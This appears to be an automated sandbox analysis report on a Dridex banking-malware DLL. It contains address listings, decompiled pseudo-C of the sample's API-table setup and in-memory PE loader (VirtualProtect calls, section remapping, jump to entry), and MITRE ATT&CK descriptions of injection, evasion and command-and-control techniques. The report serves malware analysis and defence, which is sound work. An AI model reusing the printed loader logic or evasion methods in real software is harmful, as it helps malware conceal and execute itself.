0x6e84155d
0x6e841561
0x6e84156a
0x6e841570
0x6e841573
0x6e841577
0x6e84157f
0x6e841581
0x6e841585
0x6e84158c
0x6e841595
0x6e841595
0x6e841599
0x6e8415ae
0x6e8415c4
0x6e8415d1
0x6e8415d2
0x6e8415d2
0x6e8415d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e84158e
0x6e84158e
0x6e84158e
0x6e84158f
0x6e841590
0x00000000
0x6e84158e
0x6e841553
0x6e841557
0x00000000
0x00000000
0x00000000
0x6e8415d8
0x6e8415d8
0x6e8415d9
0x6e8415dc
0x6e8415e6
0x6e8415e6
0x6e8415ea
0x6e8415f1
0x6e84164c
0x6e841651
0x6e8416a4
0x6e8416a4
0x6e8416a8
0x6e8416ac
0x6e8414d6
0x6e8414d9
0x6e8414de
0x6e8414e4
0x6e8414e7
0x6e8414ee
0x6e8414f2
0x6e8414f9
0x6e841502
0x6e841506
0x6e84150a
0x6e841510
0x00000000
0x00000000
0x00000000
0x6e841510
0x6e8416b6
0x6e8416c2
0x6e8416cd
0x6e8416d4
0x6e8416dd
0x6e8416e7
0x6e8416e8
0x6e8416f6
0x6e8416fb
0x6e8416fc
0x6e841709
0x6e84170e
0x6e841720
0x6e841725
0x6e84172a
0x6e84173c
0x6e84174e
0x6e841753
0x6e84175e
0x6e841765
0x6e84176a
0x6e841772
0x6e84177b
0x6e84177b
0x6e841787
0x6e84178e
0x6e84179a
0x6e8417a6
0x6e8417b4
0x6e8417c5
0x6e8417cc
0x6e8417d1
0x6e8417da
0x6e8417df
0x6e8417e1
0x6e8417e5
0x6e8417e9
0x6e8417f6
0x6e841803
0x6e841807
0x6e84181b
0x6e84181f
0x00000000
0x00000000
0x6e841834
0x6e841836
0x6e84183e
0x6e84183b
0x6e84183b
0x6e84183b
0x6e841842
0x6e841844
0x6e84184a
0x6e841850
0x6e8418ac
0x6e8418b5
0x6e8418b9
0x6e8418c6
0x6e8418cf
0x6e8418d4
0x6e8418d8
0x6e8418db
0x6e84193c
0x6e841952
0x6e84195d
0x6e84195e
0x6e84195f
0x6e841963
0x6e841966
0x6e841be6
0x6e841be9
0x6e841be9
0x00000000
0x6e841966
0x6e8418e5
0x6e8418f5
0x6e8418fe
0x6e841907
0x6e841910
0x6e841911
0x6e841912
0x6e841917
0x6e84191f
0x6e841927
0x00000000
0x00000000
0x00000000
0x6e841929
0x6e841859
0x6e84185e
0x6e841862
0x6e841862
0x6e841866
0x6e841869
0x00000000
0x00000000
0x6e84188a
0x6e84188c
0x6e841890
0x6e841892
0x00000000
0x00000000
0x6e841894
0x6e84189b
0x6e8418a7
0x00000000
0x6e8418a7
0x6e84186e
0x00000000
0x6e84196c
0x6e84196c
0x6e84196d
0x6e84197d
0x6e841989
0x6e841992
0x6e84199b
0x6e8419a4
0x00000000
0x6e8419a4
0x6e841653
0x6e841655
0x6e841657
0x6e84165c
0x6e841661
0x6e841674
0x6e84168a
0x6e841693
0x6e841694
0x6e841694
0x6e841696
0x6e841697
0x6e84169a
0x6e84169e
0x00000000
0x6e841657
0x6e8415f3
0x6e8415fd
0x6e8415fe
0x6e8415fe
0x6e84160b
0x6e841617
0x6e841619
0x6e84161b
0x6e84161f
0x6e84162f
0x6e84162f
0x6e841636
0x6e841639
0x6e84163a
0x6e84163e
0x6e841648
0x00000000
0x6e841648

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20918bf2ffde06185024e8e4111b4fd8e0b6ef91ea84d25b4a49e8eae01332e3
Instruction ID: b5fe267de17a2b542d88feaf3e55fcaf6c2a602986c01e6f4975fe95ecf24d46
Opcode Fuzzy Hash: 20918bf2ffde06185024e8e4111b4fd8e0b6ef91ea84d25b4a49e8eae01332e3
Instruction Fuzzy Hash: 5F327D70108359CFD714DFA8C890ADAB7E4FF95304F208D2DE599872A1EB70E959CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E836D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E836D0C() {

				 *0x6e84d280 = GetUserNameW;
				 *0x6E84D284 = MessageBoxW;
				 *0x6E84D288 = GetLastError;
				 *0x6E84D28C = CreateFileA;
				 *0x6E84D290 = DebugBreak;
				 *0x6E84D294 = FlushFileBuffers;
				 *0x6E84D298 = FreeEnvironmentStringsA;
				 *0x6E84D29C = GetConsoleOutputCP;
				 *0x6E84D2A0 = GetEnvironmentStrings;
				 *0x6E84D2A4 = GetLocaleInfoA;
				 *0x6E84D2A8 = GetStartupInfoA;
				 *0x6E84D2AC = GetStringTypeA;
				 *0x6E84D2B0 = HeapValidate;
				 *0x6E84D2B4 = IsBadReadPtr;
				 *0x6E84D2B8 = LCMapStringA;
				 *0x6E84D2BC = LoadLibraryA;
				 *0x6E84D2C0 = OutputDebugStringA;
				return 0x6e84d280;
			}

0x6e836d1d
0x6e836d25
0x6e836d28
0x6e836d37
0x6e836d3a
0x6e836d49
0x6e836d4c
0x6e836d5b
0x6e836d5e
0x6e836d6d
0x6e836d70
0x6e836d7f
0x6e836d82
0x6e836d91
0x6e836d94
0x6e836da3
0x6e836da6
0x6e836da9

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364fb8c0f87f47dfe4f8ad5a43a37152e2e09d2d8d213bd58091cfd76bcd6090
Instruction ID: 8119441b124b5d55f51d351fcc9919c689e4279637155e1fcebb0e64062c42f4
Opcode Fuzzy Hash: 364fb8c0f87f47dfe4f8ad5a43a37152e2e09d2d8d213bd58091cfd76bcd6090
Instruction Fuzzy Hash: 5811E0B8A15A10CF8B5ADF0AD1908517BF1FB8E31035282EAD80D8F365E735E845CF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6368 Parent PID: 6328 rundll32.exeCOMMON

Executed Functions

Function 03222092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E03222092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0x3224418 = 1;
				asm("movaps xmm0, [0x3223010]");
				asm("movups [0x3224428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E03221770();
				E032217BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E03221770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0x3224418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E03221770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x0322209e
0x032220ac
0x032220b3
0x032220b6
0x032220c0
0x032220c7
0x032220d1
0x032220d7
0x032220e0
0x032220e9
0x032220ec
0x032220f0
0x032220f8
0x032220ff
0x03222102
0x03222105
0x03222108
0x0322210b
0x03222125
0x0322212b
0x0322212e
0x03222136
0x0322213a
0x0322213d
0x03222140
0x03222143
0x03222146
0x03222162
0x0322217f
0x032221a4
0x032221a6
0x032221af
0x032221b2
0x032221bc
0x032221bf
0x032221c2
0x032221c5
0x032221c8
0x03222216
0x03222216
0x03222249
0x0322224c
0x0322225c
0x0322225f
0x032222a8
0x032222a8
0x032222b7
0x032222bf
0x032222cd
0x032222dc
0x0322230d
0x03222316
0x0322231a
0x0322231e
0x03222325
0x0322232b
0x0322232d
0x03222336
0x03222347
0x0322234d
0x03222350
0x03222353
0x00000000
0x00000000
0x03222359
0x032222a8
0x03222264
0x03222272
0x0322227a
0x0322227d
0x0322227f
0x03222285
0x03222291
0x03222297
0x0322229a
0x0322229d
0x032221f9
0x032221f9
0x0322236e
0x03222374
0x03222379
0x0322237f
0x03222385
0x0322238b
0x03222391
0x03222394
0x03222397
0x0322239f
0x032223a7
0x032223ad
0x032223b3
0x032223b9
0x032223bf
0x032223cd
0x032221da
0x032221e0
0x032221e0
0x03222234

APIs

VirtualProtect.KERNELBASE ref: 0322210B
VirtualProtect.KERNELBASE ref: 032221A4
VirtualProtect.KERNELBASE ref: 0322232B

Strings

`, xrefs: 0322239F

Memory Dump Source

Source File: 00000002.00000002.302047407.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: b64dbaa168ad934c64c61b22954c09f0a895fe1c087a294497270bf63ded29ad
Instruction ID: 13a9a29ddccf1454731a7b98fad4ceebe00299fe4128bb156d327de9cfeacc10
Opcode Fuzzy Hash: b64dbaa168ad934c64c61b22954c09f0a895fe1c087a294497270bf63ded29ad
Instruction Fuzzy Hash: E6B1BDB4E10329DFCB14CF99C880A9DBBF1BF88304F15856AE958AB351D731A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03221000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 032210FF

Memory Dump Source

Source File: 00000002.00000002.302047407.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: 0e9ba37fdf5da921e955497e9db62e411c3a8858981c79a558f363a63d35b8cc
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: 9E41F4B5E1521A9FDB04CFA9C490AAEBBF0FF48314F18852DD848AB340D375A880CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.4295.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6E840730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6E842234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E842820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E843138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6E8410A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6E8457B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E845B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 6E841166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6E845BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E845BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E845BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6E845BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6E845C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6E845E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E845E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6E84564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E841030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6E843628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E831494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E83A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E838428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6E849370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E84143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E836D0C, Relevance: .0, Instructions: 36
COMMON

Function 03222092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON